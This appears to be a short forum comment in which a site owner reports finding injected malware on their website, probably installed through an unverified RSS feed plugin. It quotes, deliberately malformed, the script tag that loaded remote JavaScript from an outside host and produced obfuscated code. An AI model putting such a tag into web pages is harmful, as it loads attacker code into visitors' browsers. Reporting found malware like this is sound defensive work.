Using a clue from your links, I was able to find this piece of malignant code (I have malformed the .js on purpose):
<script type="text/javascript" src="http://kollinsoy.skyefenton.com:8080/Web_Page. js"></script>
Which was creating the offending obfuscated script.
I strongly suspect that I acquired the malware through installing a non-verified RSS feed plugin. Rookie mistake 🙁
